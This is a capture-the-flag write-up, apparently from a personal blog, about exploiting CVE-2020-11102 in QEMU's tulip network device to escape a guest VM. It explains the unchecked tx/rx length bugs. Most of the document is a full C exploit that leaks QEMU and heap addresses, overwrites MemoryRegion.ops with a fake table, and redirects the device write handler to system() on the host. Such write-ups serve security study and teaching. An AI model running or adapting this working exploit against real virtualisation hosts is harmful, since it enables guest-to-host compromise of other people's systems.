Logo xia0o0o0o

CVE-2020-11102: Escape from the Earth

April 25, 2023
7 min read
Table of Contents

CVE-2020-11102: Escape from the Earth

Introduction

I participated in the Aliyun CTF competition recently and solved an interesting challenge based on CVE-2020-11102, which is a vulnerability in qemu that allows guest OS to escape and execute arbitrary code on the host OS. In this article, I would like to share some detail about the challenge and what I learned from it.

The vulnerability

static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
    int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
    int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;
 
    if (len1) {
        pci_dma_read(&s->dev, desc->buf_addr1,
            s->tx_frame + s->tx_frame_len, len1);
        s->tx_frame_len += len1;
    }
 
    if (len2) {
        pci_dma_read(&s->dev, desc->buf_addr2,
            s->tx_frame + s->tx_frame_len, len2);
        s->tx_frame_len += len2;
    }
    desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}

Take a look at tulip_copy_tx_buffers() first. It copies the desc->buf_addr1 to the tx_frame + s->tx_frame_len. Notice that there is no check for the s->tx_frame_len as well as the len1. And s->tx_frame_len will be increased by len1 after copying. When we call this function multiple times, the s->tx_frame_len can be increased to a very large value, which can cause a buffer overflow.

The same applies to tulip_copy_rx_bytes().

static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
    int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
    int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
    int len;
 
    if (s->rx_frame_len && len1) {
        if (s->rx_frame_len > len1) {
            len = len1;
        } else {
            len = s->rx_frame_len;
        }
        pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
            (s->rx_frame_size - s->rx_frame_len), len);
        s->rx_frame_len -= len;
    }
 
    if (s->rx_frame_len && len2) {
        if (s->rx_frame_len > len2) {
            len = len2;
        } else {
            len = s->rx_frame_len;
        }
        pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
            (s->rx_frame_size - s->rx_frame_len), len);
        s->rx_frame_len -= len;
    }
}

The tulip_copy_rx_bytes() function copies the s->rx_frame to the desc->buf_addr1. And there is no check for the s->rx_frame_len and s->rx_frame_size. This results in possible memory disclosure.

Exploitation

Leak something first

To leak QEMU base address and heap address we need to control s->rx_frame_size and s->rx_frame_len. Consider the following code:

typedef struct TULIPState {
    PCIDevice dev;
    MemoryRegion io;
    MemoryRegion memory;
    NICConf c;
    qemu_irq irq;
    NICState *nic;
    eeprom_t *eeprom;
    uint32_t csr[16];
 
    /* state for MII */
    uint32_t old_csr9;
    uint32_t mii_word;
    uint32_t mii_bitcnt;
 
    hwaddr current_rx_desc;
    hwaddr current_tx_desc;
 
    uint8_t rx_frame[2048];
    uint8_t tx_frame[2048];
    int tx_frame_len;
    int rx_frame_len;
    int rx_frame_size;
 
    uint32_t rx_status;
    uint8_t filter[16][6];
} TULIPState;

The tx_frame is a fixed size buffer, which is 2048 bytes. By triggering tulip_copy_tx_buffers() multiple times, we can control tx_frame_len, rx_frame_len and rx_frame_size. Then we can call tulip_copy_rx_bytes() and copy the heap memory back to the user space of the guest OS. With some calculation, we can retrieve the QEMU base address and heap address very easily.

After leaking the memory, we need to figure out how to get arbitrary code exection within the context of QEMU. This piece of code caught my attention:

static const MemoryRegionOps tulip_ops = {
    .read = tulip_read,
    .write = tulip_write,
    .endianness = DEVICE_LITTLE_ENDIAN,
    .impl = {
        .min_access_size = 4,
        .max_access_size = 4,
    },
};

What if we can control the function pointer in tulip_ops? Unfortunately, the tulip_ops is not writable.

When initializing the memory region of TULIPState, the pointer to tulip_ops will be assigned to struct MemoryRegion.ops.

    memory_region_init_io(&s->io, OBJECT(&s->dev), &tulip_ops, s,
            "tulip-io", 128);
 
    memory_region_init_io(&s->memory, OBJECT(&s->dev), &tulip_ops, s,
            "tulip-mem", 128);
            
struct MemoryRegion {
    Object parent_obj;
 
    /* All fields are private - violators will be prosecuted */
 
    /* The following fields should fit in a cache line */
    bool romd_mode;
    bool ram;
    bool subpage;
    bool readonly; /* For RAM regions */
    bool nonvolatile;
    bool rom_device;
    bool flush_coalesced_mmio;
    bool global_locking;
    uint8_t dirty_log_mask;
    bool is_iommu;
    RAMBlock *ram_block;
    Object *owner;
 
    const MemoryRegionOps *ops;
    void *opaque;
    MemoryRegion *container;
    Int128 size;
    hwaddr addr;
    void (*destructor)(MemoryRegion *mr);
    uint64_t align;
    bool terminates;
    bool ram_device;
    bool enabled;
    bool warning_printed; /* For reservations */
    uint8_t vga_logging_count;
    MemoryRegion *alias;
    hwaddr alias_offset;
    int32_t priority;
    QTAILQ_HEAD(, MemoryRegion) subregions;
    QTAILQ_ENTRY(MemoryRegion) subregions_link;
    QTAILQ_HEAD(, CoalescedMemoryRange) coalesced;
    const char *name;
    unsigned ioeventfd_nb;
    MemoryRegionIoeventfd *ioeventfds;
};

And struct MemoryRegion is allocated on the heap. So we can overwrite the struct MemoryRegion.ops with the address of tx_frame and craft a fake struct MemoryRegionOps. Also, notice that the type of tx_frame_len, rx_frame_len and rx_frame_size are all int, which means we can write backward if we overwrite these fields with negative value.

Exploitation

The exploitation should be pretty straightforward and the comments in the code should be self-explanatory.

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <sys/io.h>
 
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
 
#define PMIO_BASE 0x000000000000c000
#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6
 
#if 0
 
tulip_write ->
tulip_xmit_list_update -> 
tulip_copy_tx_buffers ->         
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->
 
static uint32_t tulip_ts(TULIPState *s)
{
    return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}
 
#endif
 
struct tulip_descriptor {
    uint32_t status;
    uint32_t control;
    uint32_t buf_addr1;
    uint32_t buf_addr2;
};
 
int fd;
 
uint32_t page_offset(uint32_t addr) {
    return addr & ((1 << PAGE_SHIFT) - 1);
}
 
uint64_t gva_to_gfn(void *addr) {
    uint64_t pme, gfn;
    size_t offset;
    offset = ((uintptr_t)addr >> 9) & ~7;
    lseek(fd, offset, SEEK_SET);
    read(fd, &pme, 8);
    if (!(pme & PFN_PRESENT))
        return -1;
    gfn = pme & PFN_PFN;
    return gfn;
}
 
uint64_t gva_to_gpa(void *addr) {
    uint64_t gfn = gva_to_gfn(addr);
    assert(gfn != -1);
    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
 
uint64_t pmio_read(uint64_t port) {
    uint64_t val;
    val = inw(PMIO_BASE + port);
    return val;
}
 
void pmio_write(uint64_t port, uint64_t val) {
    outw(val, PMIO_BASE + port);
}
 
void pmio_writel(uint64_t port, uint64_t val) {
    outl(val, PMIO_BASE + port);
}
 
int main(int argc, char **argv) {
    printf("[*] enter stage1\n");
    int ret = 0;
    fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("open");
        exit(1);
    }
    iopl(3);
 
    // allocate descriptor
    struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
    struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));
 
    char *recv_buf = malloc(0x9000);
    char *buf = malloc(0x1000);
    memset(buf, 'A', 0x1000);
    memset(recv_buf, 'B', 0x9000);
 
    int len1 = 0x400 << 0;
    int len2 = 0 << 11;
    tx_desc->status     = (1UL << 31) | (1UL << 24);
    tx_desc->control    = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
    tx_desc->buf_addr1  = gva_to_gpa(buf);
    tx_desc->buf_addr2  = 0x180; 
    printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);
 
    // get the physical address of the descriptor
    uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
    printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);
 
    // set CSR5_TS_SUSPENDED
    pmio_writel(CSR(6), 1u << 13); // CSR6_ST
 
    // set tx descriptor
    sleep(1);
    pmio_writel(CSR(4), tx_desc_gpa);   // tx_frame_len should be 0x400 now
 
    printf("[*] fill tx_frame\n");
 
    // set tx descriptor
    sleep(1);
    tx_desc->status     = (1UL << 31) | (1UL << 24);
    tx_desc->control    = len2 | len1 | (1UL << 24);   
    tx_desc->buf_addr1  = gva_to_gpa(buf);
    tx_desc->buf_addr2  = 0x180;
    pmio_writel(CSR(4), tx_desc_gpa);   // tx_frame_len shoule be 0x800 now
 
    // tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
    printf("[*] clean CSR5\n");
    pmio_writel(CSR(5), 0xffffffff);
    struct oob_data {                   // control the following fields in TULIPState
        int tx_frame_len;
        int rx_frame_len;
        int rx_frame_size;
 
        uint32_t rx_status;
        uint8_t filter[16][6];
    };
    len1 = sizeof(struct oob_data);
    struct oob_data *oob_data = malloc(sizeof(struct oob_data));
    oob_data->tx_frame_len = 0x400 - len1;
    oob_data->rx_frame_len = 0x900;
    oob_data->rx_frame_size = 2048*2 + 0x900;
    for (int i = 0; i < 16; i++) {          // bypass some stuff
        oob_data->filter[i][0] = 'A';
        oob_data->filter[i][1] = 'A';
        oob_data->filter[i][2] = 'A';
        oob_data->filter[i][3] = 'A';
        oob_data->filter[i][4] = 'A';
        oob_data->filter[i][5] = 'A';
    }
 
    tx_desc->status     = (1UL << 31) | (1UL << 24);
    tx_desc->buf_addr1  = gva_to_gpa(oob_data);
    tx_desc->buf_addr2  = 0x180;
    tx_desc->control    = len2 | len1 | (1UL << 24) | (1UL << 30);
    pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1));         // CSR6_OM_SHIFT trigger tulip_receive
 
    sleep(1);
    printf("[*] OOB write tx_frame_len...\n");
 
    int rx_len1, rx_len2;
    rx_len1 = 0x400;
    rx_len2 = 0;
    rx_desc->status     = (1UL << 31) | (1UL << 24); // RDES0_OWN
    rx_desc->buf_addr1  = gva_to_gpa(recv_buf);
    rx_desc->buf_addr2  = 0x180;
    rx_desc->control    = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);
 
    // set rx descriptor
    sleep(1);
    uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
    printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
    pmio_writel(CSR(3), rx_desc_gpa);
 
    // set tx descriptor
    sleep(1);
    pmio_writel(CSR(4), tx_desc_gpa);
 
    printf("[+] leak\n");
    char *cur = (char *)recv_buf;
    for (int i = 0; i < 50; ++i) {
        printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
        cur += 16;
    }
    cur = (char *)recv_buf;
    uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
    uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
    uint64_t qemu_plt_system = qemu_base+2859620;
    uint64_t frame_base = heap_base+0xe0fcf0;
    printf("[*] continue...\n");
    printf("[+] qemu_base: 0x%lx\n", qemu_base);
    printf("[+] heap_base: 0x%lx\n", heap_base);
 
    printf("[*] enter stage2\n"); {
 
        len1 = 0x400 << 0;
        len2 = 0 << 11;
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->control    = len2 | len1 | (1UL << 29) | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(buf);
        tx_desc->buf_addr2  = 0x180;
        printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);
 
        uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
        printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);
 
        // CSR5_TS_SUSPENDED
        pmio_writel(CSR(6), 1u << 13); // CSR6_ST
 
        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);
 
        printf("[*] fill tx_frame\n");
 
        // set tx descriptor
        sleep(1);
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->control    = len2 | len1 | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(buf);
        tx_desc->buf_addr2  = 0x180;
        pmio_writel(CSR(4), tx_desc_gpa);
 
        // tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
        printf("[*] clean CSR5\n");
        pmio_writel(CSR(5), 0xffffffff);
 
        len1 = sizeof(struct oob_data);
        struct oob_data *oob_data = malloc(sizeof(struct oob_data));
        oob_data->tx_frame_len = -0x3350 - 0x70;
        oob_data->rx_frame_len = 0;
        oob_data->rx_frame_size = 0;
        for (int i = 0; i < 16; i++) {          // bypass some stuff 
            oob_data->filter[i][0] = 0xff;
            oob_data->filter[i][1] = 0xff;
            oob_data->filter[i][2] = 0xff;
            oob_data->filter[i][3] = 0xff;
            oob_data->filter[i][4] = 0xff;
            oob_data->filter[i][5] = 0xff;
        }
 
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(oob_data);
        tx_desc->buf_addr2  = 0x180;
        tx_desc->control    = len2 | len1 | (1UL << 24);
        pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // trigger tulip_tx
 
        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);
 
        sleep(1);
        uint64_t *binsh = (uint64_t *)malloc(0x200);
        binsh[0] = 7449354444534473059; // catflag
        binsh[1] = 0;
        len1 = 16;
        len2 = 0;
        tx_desc->status = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1 = gva_to_gpa(binsh);
        tx_desc->buf_addr2 = 0x180;
        tx_desc->control = len2 | len1 | (1UL << 24);
        pmio_writel(CSR(4), tx_desc_gpa);
    }
    
    // now control MemoryRegion.ops
    printf("[*] enter stage3\n"); {
        ((uint64_t *)buf)[0] = qemu_plt_system;
        ((uint64_t *)buf)[1] = qemu_plt_system;
        
        ((uint64_t *)buf)[2] = 0;
        ((uint64_t *)buf)[3] = 0;
 
        ((uint64_t *)buf)[4] = 2;
        ((uint64_t *)buf)[5] = 0;
 
        ((uint64_t *)buf)[6] = 0;
        ((uint64_t *)buf)[7] = 0;
        
        ((uint64_t *)buf)[8] = 0x0000000400000004;
        ((uint64_t *)buf)[9] = 0;
        
        ((uint64_t *)buf)[10] = 0;
        ((uint64_t *)buf)[11] = 0;
        len1 = 0x400 << 0;
        len2 = 0 << 11;
        tx_desc->status = (1UL << 31) | (1UL << 24);
        tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
        tx_desc->buf_addr1 = gva_to_gpa(buf);
        tx_desc->buf_addr2 = 0x180;
        printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);
 
        uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
        printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);
 
        // CSR5_TS_SUSPENDED
        pmio_writel(CSR(6), 1u << 13); // CSR6_ST
 
        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);
 
        printf("[*] fill tx_frame\n");
 
        // set tx descriptor
        sleep(1);
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->control    = len2 | len1 | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(buf);
        tx_desc->buf_addr2  = 0x180;
        pmio_writel(CSR(4), tx_desc_gpa);
 
        // tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
        printf("[*] clean CSR5\n");
        pmio_writel(CSR(5), 0xffffffff);
        
        len1 = sizeof(struct oob_data);
        struct oob_data *oob_data = malloc(sizeof(struct oob_data));
        oob_data->tx_frame_len = -0x2a28-0x70;  // now points to the MemoryRegion.ops
        oob_data->rx_frame_len = 0;
        oob_data->rx_frame_size = 0;
        for (int i = 0; i < 16; i++) {          // bypass some stuff 
            oob_data->filter[i][0] = 0xff;
            oob_data->filter[i][1] = 0xff;
            oob_data->filter[i][2] = 0xff;
            oob_data->filter[i][3] = 0xff;
            oob_data->filter[i][4] = 0xff;
            oob_data->filter[i][5] = 0xff;
        }
 
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(oob_data);
        tx_desc->buf_addr2  = 0x180;
        tx_desc->control    = len2 | len1 | (1UL << 24);
        
        // set tx descriptor
        sleep(1);
        pmio_writel(CSR(4), tx_desc_gpa);
 
        sleep(1);
        printf("[*] hijack ops\n");
        uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
        fake_memory_region_ops[0] = frame_base;
        len1 = 8;
        len2 = 0;
        tx_desc->status     = (1UL << 31) | (1UL << 24);
        tx_desc->buf_addr1  = gva_to_gpa(fake_memory_region_ops);
        tx_desc->buf_addr2  = 0x180;
        tx_desc->control    = len2 | len1 | (1UL << 24);
        pmio_writel(CSR(4), tx_desc_gpa);
        
        // trigger the ops.write
        pmio_writel(CSR(4), tx_desc_gpa);
    }
 
    return 0;
}